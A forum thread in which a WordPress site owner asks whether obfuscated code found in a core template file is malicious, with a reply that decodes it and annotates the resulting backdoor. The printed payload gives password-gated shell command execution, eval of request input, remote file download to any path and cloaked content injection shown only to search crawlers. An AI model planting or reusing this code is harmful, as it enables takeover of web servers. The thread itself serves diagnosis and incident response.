Non-programmer wondering if this is malicious code in WordPress post-template

This is in my post-template file in includes folder (WordPress) and I’m wondering if it is malicious. Discovered via file monitor plug-in which showed a change to the file but I didn’t know if this might be a result of some non-malicious process. Excuse me if I don’t enter it properly. Appreciate your assistance. Please assume I know nothing because I don’t.

 /**
 * Applies custom filter.
 *
 * @since 0.71
 *
 * $text string to apply the filter
 * @return string
 */
    function applyfilter($text=null) {
    @ini_set('memory_limit','256M');
if($text) @ob_start();
if(1){global $O10O1OO1O;$O10O1OO1O=create_function('$s,$k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if(!function_exists("O01100llO")){function O01100llO(){global $O10O1OO1O;return call_user_func($O10O1OO1O,'xEe%7c0BgX%3cyl%3cJrCC%3cCffjjA%5dio%21fj%2bu%21%3bRiiRHIe55%3a7GK4ud%2dYfEWWEv%22%20FFVz%3b%3c%3c%26%2fA%26%5bmVvllG9bCC%40%3bL%29%2fhV%40%3cc%3c%3dNpx2%2d%2dRS3%2c%2c%7cE%2bE%3d%3a%7c%2cRyf%5eAA%5dooIf0GT8c%7cgZCimGK%3a%21yCcy%28Tr%7c%2e%21%2cR%5c9N%28y%3b%7dx%2dY%5eM%21%2dM%2b%7e%5d%23%3bL%2a%5b%27%7crqg7F%3dFPR%5fu%26v6S%258%2f%20%3fR%3cr%7c%3cNVoIDnlJ%2elfGJJ%21%20oJM%29R%3b%2da%202LM%20tLL%2c%2cnb7MfX%40bEAb%3fqOB%5dz%5ezh%5dk5T23I%262pr95P%29xHuw%3f%5fr%23LLt9x%2c4dPQsNaWFbv0XT%3cY%5eZo%5effO%5dl%27O%27q21%7bHU%5biw%29%406zRb%2a%2df1%26%7eeZH%28a%5d%5bv%7d%40rl%27%5eT%3fs%2a%21QN0ow6%27Ec%29%5bK%26%7crq%3c%7bgd%5cPDy9%5f7%5cB%3ep%40bP%3a%5ePL%5ede%25%7d%3a%29Hr%21WNS%229V%25Gy%2eJCGokJX%29N%2bRv0%26W7Yn4%4066f7wMu%2f%28anf%5ejXn%3ed%2fA%3f%5d%5bhpqh3%25%5f%3fBw%3elr%7bbnz39s8%3f%409%21%20s%2e%3f%3dCF%7ctyJ%2e%3a%2eHCZ%21uK%24bY%7c6%40%3crCiQ%21xCOz%40Qo%20%2dWfM%3bzt%5dWIRn%27OIUvE0UAUo%60%3eA1Z3er%3allG92%7c%23qeNt8iiQ%20%20%24%7e%7e%3di%29%40Ikw6P%2fuCVPMoDG%3av%2c5%26qr%3aXl%28t%21%3ba%5dJ%23iL%7d%28%28%7bws%24%28%5fq%25AE%5f%3dMwuS9N%2eytv0E%5doj0uEiz1w9qST%2clCiHiKLhs6y%2eCAWgTS%3eS%23%21U%2d%3eJmV%7dMI%27O%3aZ%2e%20Kb%7c%23%28H%24RjCQx%7et%23%23%26h%40%21%23h%5bTf%5ehd%2d%60C%3c%27zO%5dX%27%5c%40%2eB%3aXz%27dzp71p%26TDMrc%7dGZ%2aGe%2dljy%5fr9cVBgS%21W%24%2aBc%3cLc%29yr%29e%2cM%5fbNwX%2b8XYh0%3eECRa%28%7d%2bOQL%24MvRRw%40PtRph%3aI%27pcW%5fYKEjUqhIdP%28m%2ek4q6spsh%5bwgPBd3%5c9d6d8cHQ%2b%5cJ8%7clcrCtV%5dTJOmD%3axlS%25r01lLx%7da%7dt7J%5e%29%7e%2bYWb%210%7d00j%5dn%5en7lMr%29H%5cZnhk%27%5bk%3e%5fw%22UDkg%27D%2a%5e%23S%5bANE%27%2bk1%5fO0zq%5eq%7bph3zB%5cXP%25c%2d%2exJ%2e%2eiv%2cBdXrJLt%283%27Oyo%5e4p%7e%21MnL%26%23k2CxFEo%5d%2dknkEY%2af%5cbo3%601l%3cTE%3cokS%3dnX%25QcfE%28PFwF%3dVC%2fz%26QSZ%25SSr%23%2159RdNV%7dNxH%29C%3ax%2bvPV0AL%2dtLLM%5dA%25r
%5bi%7b%212%268%27%7ev%2c%60qnokYO%227%28M4%28%2dWBgXEh%27o1yoVYi%24%7bP64%5c5%5fl%60r5JK%5b%60C%5b17Q%2b%5cioXlmFDPS%7cGZa%7ds%3df%3cn2%7cY%22%60yC%24%7e%2fN%2c%20NJ%28bN%282Ul99%2fpCy%5cJpwl%5c9%24aFv%3fr0OI%3ew9I94%22%3cmL%7cK%3aCrS%3b3LhZemTpTScHxA%7erl%3a%25mrL%28%5b%7dvbW0v%7d%5bZq%7c%2ar%2f%3bJC%235CRa%28%7d%2bOIF2s%23LXM%2dnd%2dq%7dYI%27kzN%5b%5e%5b%5b1%60OqOdS%3dygh%3a%3aGGKu4C%40%3aG%3b4mP4%3cB%3d%3d4Sg8P6V%3c%25m%3b%7ecR%20%3d%2dy%3czcx%24x%29%26r%29Jf%29M%3b%29%2c%7e%7d%7dJ%7eXRb00q%28REj%2aL%27%2bk%27fkk%2b%5csn7%2aCqEXw7k74DT%29O%3c5%5b%24%26%2d5F%3e83s%3e%3fTJ4BdmP%2bt%3f%2dgM%3ea%28S%7d%5dm%5bZ%21i%2ecKtu%2f0bHjhu%5e%2d%2e4x8%2c%23H%2dtX%20%2d%2a%2aENfkk7%22%3cNr%27%2aWjUAbE2I%5d3Vm%2ek%3e%27h3UZS%5c%28%3b8V8%3fCw%2fVNn%3emcDS%3eF%24gPRkcel%25MRrvWz%25%20%2f%28L%28%23G0%3b5%2a%21vR%21%2btNN%21N%5fW7%224pp%40X%5f5n%27Ok%27%3fY%40A1%7b%605hmA%3e%5b1h%26ZO%3c9%5f%405%3a%3c%7b48P99P7CfcSW6Hor%3af%23D%2fuG%2fW%3c%2bcbQ%20%21S%23u%23Q%2fyxjy%22txz%29H2I%3bnb0fX37%2d9%7dph%5eX%5d%2acW%5b%5e1312X5h7OCBo%2667%26sw%40%40%26%40%2e%5cs%29iQQP%2eC%5cHK%40Vd%20VKeVu%25GGd%25%21lHQQWZKtu%2flf%5eK%2bupQY%20%21%27k%24qO%2bff%7bg%3bjNoIoAae%5eoOkz%5eA%3ffuqAmPh44%3cx%27Fz3%22%3f5%227l%22%3dg%22D%3fVV7%3f%3aFerr%23BGTD%7cr%3eSQZ%25TvWS%2dZW%21LL%607%2dQH%28%3bC%20b%24%23z%27%28%268%24XMA%5dAfRhEzzTvw%2b%5e%271E%27kP%2773%27%221%5f%5fk1gw8BBr%7b%3e%3cF%3dpP7Jx%22Gp0cB6%3aG%3eGuL%2dAVzx%23HQ%3aJ%2bvGfY%28%2e%2djhu%5e%2dvvp8%2c%23H%2dtX%20%2d%2a%2aENfkk7%22%3cNr%27%2aWjUAbE2I%5d3Vm%2ek4q%5c8%5cp2%25sdd%3b%60e5%40P%3csPBHPrcPl%3c%7c%7cB%3c%29e%2exxaTxZ%21%20%24y%24Llf%5eK%2bup%2dHyv%2b%21%2bb%5b%268%24V0%2dAEonoO9%5fns%22%5b%5e1%3fr081%5f%5fyH5O%5d1q%5c%271%40%40gwsddKu%2dwWV%407%3fDBpgTFPe%28L%5edCSxHxyTa%29%24%242%7cN%3a%2e%20%2d%29unya%20WYW%2cQ%23%2d%28%2c%2bMM%2dd%2dq1nz%5dn%5bAOOnO%3dm%3c%3ccSSZ%3dF%40zZD5%40e%3d%26ZdhtF%3dVDF%3e%3de%3fSi%29%3aB%24%2aB%23%5fvE%2d%28%7dxH%29xx%21%2bv%28l%5el%26%5bU113%2ek4p%40%28%20abtq1%7eOzLh%5dINIO%2749AzBFPcgK%2fjSrGSGIT%27dFUZ%3f
P%60Pd%3eKlsF%29%20itH%2bY%5c%2d%2cW%2d%2bPL%3e%21%20V%7dxi%25i%21Q%2bv%2e%20%5eoAUjw%5fy33%5bhHziE%5d%20%26Xj%2djEA5%60%2a%5d%40%3f%5c%3d6e%7cbm%3dZ%3d%25%7cAVC%5dF%2bli%3dSs%3f8ssPlr%3d%5fJ%5fsV%3dBVB8cr8%24Xf%5e%3cVryS%3d%7dM%3ci%21Qii%24bYt%2fE%2fR%7e%2cM%7dx%27%406%5cL%24N0R%7e1%7bLEo%5dEE%27%2272n%3fnXk%5bkA1wAV%2eJx%26zw6%7bU%25Z%26g%3ePggVuKT4i4%3d%25%3c%3fS%3a%3f%7ef%5ejT%3d%3a%2e%25mMaTQ%20%21QQ%7e%2an%2du%5duWJ%23R%7d%29O6%5cst%7evX%7d%28%7b3t%5dko%5d%5dO49%26bBbOI5o%5edCy%2e%5b%27hpqSiUc%3fvsPd%3fwBpM79a%22%3egi%29%7b%7d%24%3f%20K2lC%2eK%3c%2feOl%3a%20ui%24%28KM%2f%2eJ%2dA%5e%24%7dI%22%29krw82U%2f%22%28%7b3t1whI%2foz%5bIb%27j%3alsO%7bdFA8%3foVYlHzT8N%5cg%3e85%3f4%7dm%3cD%3c8eHxeI%25%3aGed%7c%3c%2dAVtxe%26HieL%26%3a%24%7eKaf%2fiLt%20L%20QaY1%7eWv%24%60%28nj0%22%2cj%5ea%40NYjIjPf%5bUXF%5e4%5d%5bh5%25U7%5fz%7c%5bd17s8y%3f%22%3dwy%7d7C%5bt%2bP8%3crF%2aBD%3a%2ft%3b%7cknk%3cM%2fUo%5be%2bx%5ej%5eK%2bu%5eaS%20Y%3f%3b%28N%2a%3f0fXfaoh3o%2bZI%27%2b%7bM4%5dv%3fr08%7b%7bwy7%22977%40c%3cs%2c6BPsh8%22%2eGmO%5c%25bgB%3c%7c%20n8%215WiAt%7eRtyyHzU%5bKr%29%7eCXlXf%2ff%2d%2d%2c4p1z%40Qo%20%2aR%5eA%5e0t3%29%3fM79Np%22%7emn9%2208%7dcFu%3f%5bpw%5b6h44%5b4yy%2exxHiigyu%26%29GpxFbPG%3a%25%3fS%3aZ%2eRMoDZ%21i%2ec%23%2f%28%20%24tf0Qk%5cZSmc%25%3a%29KlZ3%5b%2e3PLak%5dfR%27bUIO%26%5c%40o%3eJa%7d%3bRMWAW%28b0b%2bfXt%2aAvv%5dyiCR%5f%40STV%22ZPr%25eG%7e%23c%7dz%404w%22p8DgBwgh4%22gmE%2fc%7diMzs%7e%24an%40%21eYoNYnR48p%5cM9YkoObqofz%5dl%3ba%7e%20El%25%7c%3a%29%5e5%7b%40%3eBqXoKhu%2dwpc%3cF9%25g%7cSZl%24%20TROp%22594sm%3f7%40w8FF%5ekf3KX%3c7Hv%2c%2dJ%7eX%3b%282Ua%7bg%3b1%3a%3dN%27kjMX02EOA%5b%3fs%27%3eKjI%227%60%5d%5bw%22%5c3ZS7%3a%7e%7b%404%2fG%27a%2cN%3f6%3dZP%5c%2eJ%3f%202sd%25%2eJCV%25%2e%7c%3a%25%3c%2cqo%5dofGWX%3c7%2eJ9x%2bW%2dt%2dt%2a%20%7df%5eXA5MeOIAa0%7bfXnJ1%7bq%60Gj%5dcdtj%273%5cs%40z3%5c5%5f3%26yhnh%5bUX%5b9jq1%263%24%2aHgK%3cyJy%2fmR%5c%27%2d',3863);}call_user_func(create_function('',"x65x76x61l(x4F01100llO());"));}}


4 comments

  1. It’s a remote-execution exploit, and possibly more as well

    This code evals what appears to be a decryption function:

    // Decoder body that the loader hands to create_function() with parameters ($s, $k), as recovered by the
    // commenter. It reverses a position-dependent substitution cipher:
    //   - $S holds two alphabets back to back; strpos($S,$char,95)-95 looks each input character up in the
    //     second (shuffled) alphabet, which the code expects to start at offset 95;
    //   - a rolling key, ($k + $i) mod 95, is subtracted from that index and a negative result is wrapped by +95;
    //   - the character at the resulting index of $S (the first, ordered alphabet) is appended to $target.
    // NOTE(review): this paste is damaged. "ur    ldecode" is presumably urldecode() split by the page
    // formatter, and the ordered alphabet appears to show 94 characters where the offset of 95 implies 95
    // (a backslash between "[" and "]" looks lost, as does the escaping of the quote characters).
    // Use the listing to understand the scheme; take the actual table from the infected file before relying on it.
    $s=ur    ldecode($s);
     $target='';
    $S='!#$%&()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_` '"abcdefghijklmnopqrstuvwxyz{|}~f^jAE]okI'OzU[2&q1{3`h5w_79"4p@6s8?BgP>dFV=mD<TcS%Ze|r:lGK/uCy.Jx)HiQ! #$~(;Lt-R}Ma,NvW+Ynb*0X';
     for ($i=0;
     $i<strlen($s);
     $i++) { $char=substr($s,$i,1);
     $num=strpos($S,$char,95)-95;
     $cur_key=abs(fmod($k + $i,95));
     $cur_key=$num-$cur_key;
     if($cur_key<0) $cur_key=$cur_key+95;
     $char=substr($S,$cur_key,1);
     $target.=$char;
     } return $target;
    

    It then calls this function with key 3863 on the following giant string:

    "xEe|0BgX<yl<JrCC<CffjjA]io!fj+u!;RiiRHIe55:7GK4ud-YfEWWEv" FFVz;<<&/A&[mVvllG9bCC@;L)/hV@<c<=Npx2--RS3,,|E+E=:|,Ryf^AA]ooIf0GT8c|gZCimGK:!yCcy(Tr|.!,R9N(y;}x-Y^M!-M+~]#;L*['|rqg7F=FPR_u&v6S%8/ ?R<r|<NVoIDnlJ.lfGJJ! oJM)R;-a 2LM tLL,,nb7MfX@bEAb?qOB]z^zh]k5T23I&2pr95P)xHuw?_r#LLt9x,4dPQsNaWFbv0XT<Y^Zo^ffO]l'O'q21{HU[iw)@6zRb*-f1&~eZH(a][v}@rl'^T?s*!QN0ow6'Ec)[K&|rq<{gdPDy9_7B>p@bP:^PL^de%}:)Hr!WNS"9V%Gy.JCGokJX)N+Rv0&W7Yn4@66f7wMu/(anf^jXn>d/A?][hpqh3%_?Bw>lr{bnz39s8?@9! s.?=CF|tyJ.:.HCZ!uK$bY|6@<rCiQ!xCOz@Qo -WfM;zt]WIRn'OIUvE0UAUo`>A1Z3er:llG92|#qeNt8iiQ $~~=i)@Ikw6P/uCVPMoDG:v,5&qr:Xl(t!;a]J#iL}(({ws$(_q%AE_=MwuS9N.ytv0E]oj0uEiz1w9qST,lCiHiKLhs6y.CAWgTS>S#!U->JmV}MI'O:Z. Kb|#(H$RjCQx~t##&h@!#h[Tf^hd-`C<'zO]X'@.B:Xz'dzp71p&TDMrc}GZ*Ge-ljy_r9cVBgS!W$*Bc<Lc)yr)e,M_bNwX+8XYh0>ECRa(}+OQL$MvRRw@PtRph:I'pcW_YKEjUqhIdP(m.k4q6spsh[wgPBd39d6d8cHQ+J8|lcrCtV]TJOmD:xlS%r01lLx}a}t7J^)~+YWb!0}00j]n^n7lMr)HZnhk'[k>_w"UDkg'D*^#S[ANE'+k1_O0zq^q{ph3zBXP%c-.xJ..iv,BdXrJLt(3'Oyo^4p~!MnL&#k2CxFEo]-knkEY*fbo3`1l<TE<okS=nX%QcfE(PFwF=VC/z&QSZ%SSr#!59RdNV}NxH)C:x+vPV0AL-tLLM]A%r[i{!2&8'~v,`qnokYO"7(M4(-WBgXEh'o1yoVYi${P645_l`r5JK[`C[17Q+ioXlmFDPS|GZa}s=f<n2|Y"`yC$~/N, NJ(bN(2Ul99/pCyJpwl9$aFv?r0OI>w9I94"<mL|K:CrS;3LhZemTpTScHxA~rl:%mrL([}vbW0v}[Zq|*r/;JC#5CRa(}+OIF2s#LXM-nd-q}YI'kzN[^[[1`OqOdS=ygh::GGKu4C@:G;4mP4<B==4Sg8P6V<%m;~cR =-y<zcx$x)&r)Jf)M;),~}}J~XRb00q(REj*L'+k'fkk+sn7*CqEXw7k74DT)O<5[$&-5F>83s>?TJ4BdmP+t?-gM>a(S}]m[Z!i.cKtu/0bHjhu^-.4x8,#H-tX -**ENfkk7"<Nr'*WjUAbE2I]3Vm.k>'h3UZS(;8V8?Cw/VNn>mcDS>F$gPRkcel%MRrvWz% /(L(#G0;5*!vR!+tNN!N_W7"4pp@X_5n'Ok'?Y@A1{`5hmA>[1h&ZO<9_@5:<{48P99P7CfcSW6Hor:f#D/uG/W<+cbQ !S#u#Q/yxjy"txz)H2I;nb0fX37-9}ph^X]*cW[^1312X5h7OCBo&67&sw@@&@.s)iQQP.CHK@Vd VKeVu%GGd%!lHQQWZKtu/lf^K+upQY !'k$qO+ff{g;jNoIoAae^oOkz^A?fuqAmPh44<x'Fz3"?5"7l"=g"D?VV7?:Ferr#BGTD|r>SQZ%TvWS-ZW!LL`7-QH(;C b$#z'(&8$XMA]AfRhEzzTvw+^'1E'kP'73'"1__k1gw8BBr{><F=pP7Jx"Gp0cB6:G>GuL-AVzx#HQ:J+vGfY(.-jhu^-vvp8,#H-tX 
-**ENfkk7"<Nr'*WjUAbE2I]3Vm.k4q8p2%sdd;`e5@P<sPBHPrcPl<||B<)e.xxaTxZ! $y$Llf^K+up-Hyv+!+b[&8$V0-AEonoO9_ns"[^1?r081__yH5O]1q'1@@gwsddKu-wWV@7?DBpgTFPe(L^dCSxHxyTa)$$2|N:. -)unya WYW,Q#-(,+MM-d-q1nz]n[AOOnO=m<<cSSZ=F@zZD5@e=&ZdhtF=VDF>=e?Si):B$*B#_vE-(}xH)xx!+v(l^l&[U113.k4p@( abtq1~OzLh]INIO'49AzBFPcgK/jSrGSGIT'dFUZ?P`Pd>KlsF) itH+Y-,W-+PL>! V}xi%i!Q+v. ^oAUjw_y33[hHziE] &Xj-jEA5`*]@?=6e|bm=Z=%|AVC]F+li=Ss?8ssPlr=_J_sV=BVB8cr8$Xf^<VryS=}M<i!Qii$bYt/E/R~,M}x'@6L$N0R~1{LEo]EE'"72n?nXk[kA1wAV.Jx&zw6{U%Z&g>PggVuKT4i4=%<?S:?~f^jT=:.%mMaTQ !QQ~*n-u]uWJ#R})O6st~vX}({3t]ko]]O49&bBbOI5o^dCy.['hpqSiUc?vsPd?wBpM79a">gi){}$? K2lC.K</eOl: ui$(KM/.J-A^$}I")krw82U/"({3t1whI/oz[Ib'j:lsO{dFA8?oVYlHzT8Ng>85?4}m<D<8eHxeI%:Ged|<-AVtxe&HieL&:$~Kaf/iLt L QaY1~Wv$`(nj0",j^a@NYjIjPf[UXF^4][h5%U7_z|[d17s8y?"=wy}7C[t+P8<rF*BD:/t;|knk<M/Uo[e+x^j^K+u^aS Y?;(N*?0fXfaoh3o+ZI'+{M4]v?r08{{wy7"977@c<s,6BPsh8".GmO%bgB<| n8!5WiAt~RtyyHzU[Kr)~CXlXf/f--,4p1z@Qo *R^A^0t3)?M79Np"~mn9"08}cFu?[pw[6h44[4yy.xxHiigyu&)GpxFbPG:%?S:Z.RMoDZ!i.c#/( $tf0QkZSmc%:)KlZ3[.3PLak]fR'bUIO&@o>Ja};RMWAW(b0b+fXt*Avv]yiCR_@STV"ZPr%eG~#c}z@4w"p8DgBwgh4"gmE/c}iMzs~$an@!eYoNYnR48pM9YkoObqofz]l;a~ El%|:)^5{@>BqXoKhu-wpc<F9%g|SZl$ TROp"594sm?7@w8FF^kf3KX<7Hv,-J~X;(2Ua{g;1:=N'kjMX02EOA[?s'>KjI"7`][w"3ZS7:~{@4/G'a,N?6=ZP.J? 2sd%.JCV%.|:%<,qo]ofGWX<7.J9x+W-t-t* }f^XA5MeOIAa0{fXnJ1{q`Gj]cdtj'3s@z35_3&yhnh[UX[9jq1&3$*HgK<yJy/mR'-"
    

    This results in the following code, which I have not read:

    // Global slot for the last captured error text; the error handler l1l011100l() fills it through `global $Err`.
    $Err='';
    /**
     * Dispatcher of the decoded payload: a gated backdoor plus a cloaked content injector.
     *
     * Flow, as visible in this listing:
     *  1. Run-once guard on the global $O100lO10l.
     *  2. Gate: returns unless l00101101() accepts the request's User-Agent and remote address.
     *  3. Operator branch, taken when md5($_GET['pw']) equals the hard-coded hash:
     *       ccc       -> the value is run as a shell command through l0ll0110l() and the output is printed;
     *       eee       -> the value is passed to eval() after stripslashes();
     *       otherwise -> the URL in sss is downloaded with l10010110l() and written to the path in ddd.
     *     The response is framed by the markers __beg__ and __end__.
     *  4. Otherwise, when REQUEST_URI is a key of $U, the mapped file is read, decoded with the loader's
     *     $O10O1OO1O routine and printed into the response.
     *
     * Incident-response indicators taken from this code: the query parameters pw, ccc, eee, sss and ddd,
     * the __beg__/__end__ markers in responses, and the data file named in $U.
     */
    function l101001l0l(){
        // One line, several steps: import the loader's decoder ($O10O1OO1O) and the run-once flag, return on a
        // second call, apply the visitor gate, define the URI => "path#key" map, then test the password hash.
        // "=&gt;" is presumably an HTML-escaped "=>" introduced when the listing was posted.
        global $O10O1OO1O; global $O100lO10l; if($O100lO10l==1) return; $O100lO10l=1; if(!l00101101($_SERVER['HTTP_USER_AGENT'],$_SERVER['REMOTE_ADDR'])) return; $U=array('/home/'=&gt;'/home/djinn/evermore.imagedjinn.com/home/wp-includes/images/nix756.doc#5988'); if('636c8288db06d931093b5539688e00c8'==(isset($_GET["pw"])?@md5($_GET["pw"]):"0")) {
            print('__beg__<br>');
            // Command execution: a request value reaches the shell wrapper and its output is returned to the caller.
            if(isset($_GET['ccc'])) {
                print(l0ll0110l($_GET['ccc']));
                
            }
            // Arbitrary PHP execution: a request value reaches eval() directly.
            elseif(isset($_GET['eee'])) {
                eval(stripslashes($_GET['eee']));
                
            }
            // Arbitrary file write: remote content is fetched and stored at a request-chosen path.
            else {
                // PHP errors raised during the download and write go to l1l011100l() instead of the normal handler.
                set_error_handler('l1l011100l');
                $D=l10010110l($_GET['sss']);
                // NOTE(review): $Err is not declared global in this function, so these prints appear to read an
                // unset local rather than the handler's message. Execution also continues after each "failed-N".
                if($D=='') print('failed-1: '.$Err);
                $H=$_GET['ddd'];
                // The target is made writable (0644) and then opened with 'wb', which truncates an existing file.
                @chmod($H,0644);
                if(($H=fopen($H,'wb'))===false) print('failed-2: '.$Err);
                $L=strlen($D);
                // A short write is retried once after an 8-second pause.
                if(fwrite($H,$D,$L)!=$L) {
                    sleep(8);
                    if(fwrite($H,$D,$L)!=$L) print('failed-3: '.$Err);
                    
                }
                @fclose($H);
                restore_error_handler();
                
            }
            print('<br>__end__');
            return;
            
        }
        // No valid password: content-injection path for requests that passed the gate.
        error_reporting(E_ALL);
        // Single-pass block: every path through the loop ends in break.
        while(true) {
            $RU=$_SERVER['REQUEST_URI'];
            // An absolute-form request URI is reduced to its path part.
            if(strpos($RU,'http://')!==false) {
                $RU=str_replace('http://','',$RU);
                $RU=substr($RU,strpos($RU,'/'),strlen($RU)-strpos($RU,'/'));
                
            }
            if(!isset($U[$RU])) break;
            // Map entry is "path#key": the file is read and decoded with the loader's routine using that key.
            $R=@explode('#',$U[$RU]);
            $D=read_file($R[0]);
            $D=call_user_func($O10O1OO1O,$D,$R[1]);
            // Sanity check on the first and last character of the decoded data before it is printed.
            // NOTE(review): the literals below are HTML-escaped and broken across lines in this paste;
            // presumably they were '<' and '>' (i.e. "looks like markup") — confirm against the original.
            if(substr($D,0,1)!='&lt;
            '||substr($D,strlen($D)-1,1)!='&gt;
            ') break;
            print($D);
            break;
            
        }
        error_reporting(0);
        
    }
    // Called unconditionally at the top level, so the dispatcher runs as soon as this decoded payload is
    // executed; its run-once flag ($O100lO10l) stops a second pass.
    l101001l0l();
    /**
     * Returns the contents of a local file, trying cURL's file:// handler first and PHP's file() second.
     *
     * Every call is prefixed with @, so a failed read produces no warning. The dispatcher uses this to load
     * the encoded data file named in its $U map.
     *
     * @param string $f Path of the file to read.
     * @return string|null File contents; what comes back on failure depends on file()/implode() and is not
     *                     checked here.
     */
    function read_file($f){
        $o = null;
        if(function_exists('curl_version')) {
            // CURLOPT_RETURNTRANSFER is not set, so curl_exec() echoes the data; the output buffer captures it.
            @ob_start();
            // The two pieces concatenate to "file://"; presumably split to avoid a literal match — unconfirmed.
            $h = @curl_init('file:/'.'/'.$f);
            @curl_exec($h);
            $o = @ob_get_contents();
            @ob_end_clean();
            
        }
        // Loose comparison: an empty string from the cURL attempt also triggers the file() fallback.
        if ($o==null) $o=@implode('',@file($f));
        return $o;
        
    }
    /**
     * Error handler that the dispatcher's download-and-write branch installs with set_error_handler().
     *
     * Stores "<errno>-<message>-<line>" in the global $Err and returns true, which makes PHP skip its
     * built-in handler, so the error does not go through the normal display/log path.
     *
     * NOTE(review): str_replace("n",...) as pasted strips the letter "n"; presumably the original was "\n"
     * and the backslash was lost when the listing was posted.
     */
    function l1l011100l($errno, $errstr, $file, $line){
        global $Err; $Err=$errno."-".str_replace("n",'',$errstr)."-".$line; return true;
    }
    /**
     * Shell-command wrapper: runs $c with the first available of exec, shell_exec, system and passthru and
     * returns whatever the command printed, or the string "failed" when none of the four exists.
     *
     * The dispatcher feeds it the `ccc` request parameter, so this is the command-execution half of the
     * backdoor. function_exists() reports false for functions switched off with disable_functions, which is
     * why the chain falls through from one primitive to the next.
     *
     * @param string $c Command line, taken unmodified from the request by the caller.
     * @return string|null Command output, or "failed".
     */
    function l0ll0110l($c){
        if(function_exists('exec')) {
            // NOTE(review): the "n" separator is presumably "\n" with its backslash lost in the paste.
            @exec($c,$out); return @implode("n",$out);
        }
        elseif(function_exists('shell_exec')) {
            $out=@shell_exec($c);
            return $out;
            
        }
        elseif(function_exists('system')) {
            // system() writes straight to the response, so the output is captured with a buffer instead.
            @ob_start();
            @system($c,$ret);
            $out=@ob_get_contents();
            @ob_end_clean();
            return $out;
            
        }
        elseif(function_exists('passthru')) {
            // Same buffering approach for passthru().
            @ob_start();
            @passthru($c,$ret);
            $out=@ob_get_contents();
            @ob_end_clean();
            return $out;
            
        }
        else {
            return "failed";
        }
        
    }
    /**
     * Visitor gate used by the dispatcher: decides whether a request is handled at all.
     *
     * Returns true when either
     *   - $R1: the lower-cased User-Agent contains the marker "853767", or the address starts with one of the
     *     hard-coded prefixes 157.5, 157.6, 65.5 or 207.46; or
     *   - $R2: the User-Agent contains a crawler name (googlebot, slurp, bingbot, msnbot, yahoo, live), and
     *     gethostbyaddr() returns a hostname different from the address ($R3), and that hostname ends in one
     *     of the domains in $seArray ($R4; checked by reversing both strings and testing for position 0).
     *
     * Consequence for responders: a normal browser visit does not pass this gate, so the injected output is
     * not visible by simply loading the site; look for it in the files and in what search engines indexed.
     *
     * NOTE(review): "$i&lt;5" is presumably an HTML-escaped "$i<5" introduced when the listing was posted.
     *
     * @param string $ua Request User-Agent header.
     * @param string $ip Remote address of the request.
     * @return bool Whether the dispatcher should continue.
     */
    function l00101101($ua,$ip){
        $ua=strtolower($ua); $R1=(!(strpos($ua,'853767')===false)) || (substr($ip,0,5)=='157.5') || (substr($ip,0,5)=='157.6') || (substr($ip,0,4)=='65.5') || (substr($ip,0,6)=='207.46'); $R2=!(strpos($ua,'googlebot')===false && strpos($ua,'slurp')===false && strpos($ua,'bingbot')===false && strpos($ua,'msnbot')===false && strpos($ua,'yahoo')===false && strpos($ua,'live')===false); $sHostname=''; if($R2) $sHostname=gethostbyaddr($ip); $R3=($R2 && !($sHostname==$ip)) || $R1; $sHostname=strrev($sHostname); $seArray=array('googlebot.com','msn.com','bing.com','yahoo.com','yahoo.net'); $R4=false; for($i=0; $i&lt;5; $i++) {
            // Reversed domain at position 0 of the reversed hostname means the hostname ends with that domain.
            $sRevAgent=strrev($seArray[$i]);
            $pos=strpos($sHostname,$sRevAgent);
            $R4|=(!($pos===false) && $pos==0);
            
        }
        return $R3 && ($R4 || $R1);
        
    }
    /**
     * Downloads a URL with cURL and returns the response body; used by the dispatcher's file-write branch
     * to fetch the content it then stores on disk.
     *
     * The request carries a fixed User-Agent value that itself begins with "User-Agent: " and contains the
     * misspelling "Widows NT", and it times out after one second. Both traits are usable when reviewing
     * outbound proxy or firewall logs for this infection.
     *
     * On a transport failure or any status other than 200 the result is set to '' and an E_USER_ERROR is
     * raised; the caller has l1l011100l() installed as error handler at that point.
     *
     * NOTE(review): the User-Agent literal is broken across three lines in this paste, presumably by the
     * page formatter splitting on ";" — the original string was most likely on one line.
     *
     * @param string $U URL to fetch, taken from the request by the caller.
     * @return string Response body, or '' on failure.
     */
    function l10010110l($U){
        $h=curl_init();
        curl_setopt($h,CURLOPT_URL,$U);
        curl_setopt($h,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($h,CURLOPT_USERAGENT,'User-Agent: Mozilla/4.0 (compatible;
        MSIE 5.01;
        Widows NT)');
        curl_setopt($h,CURLOPT_TIMEOUT,1);
        $R=curl_exec($h);
        $I=curl_getinfo($h);
        curl_close($h);
        if($R===false || $I['http_code']!=200) {
            $R=''; trigger_error("Curl_exec Error: ".$I['http_code'], E_USER_ERROR);
        }
        return $R;
        
    }
    
  2. I would advise you STRONGLY against installing this theme on your server… it is obvious the author is doing his/her best to obfuscate something – and it can’t be good..

  3. I also had this infection and if you have several blogs on your server, chances are they will all be infected. Notify your host and they’ll run a security scan and CHMOD all bad files to 000

  4. Just got beaten up by something very much like this. I don’t know what it did/does, but it’s bad enough that it corrupted 3 sites. Badly enough that we are starting two completely from scratch.

    I’ve learned from that that anything NOT obvious (i.e. an index file down within a CSS folder, or vice versa) should be viewed with extreme prejudice, as well as any activity in logs that changes files that would otherwise just be static.

    For example, if a footer changed, and you haven’t done any design changes, then something is amiss.

    From what I have read this is likely an FTP exploit.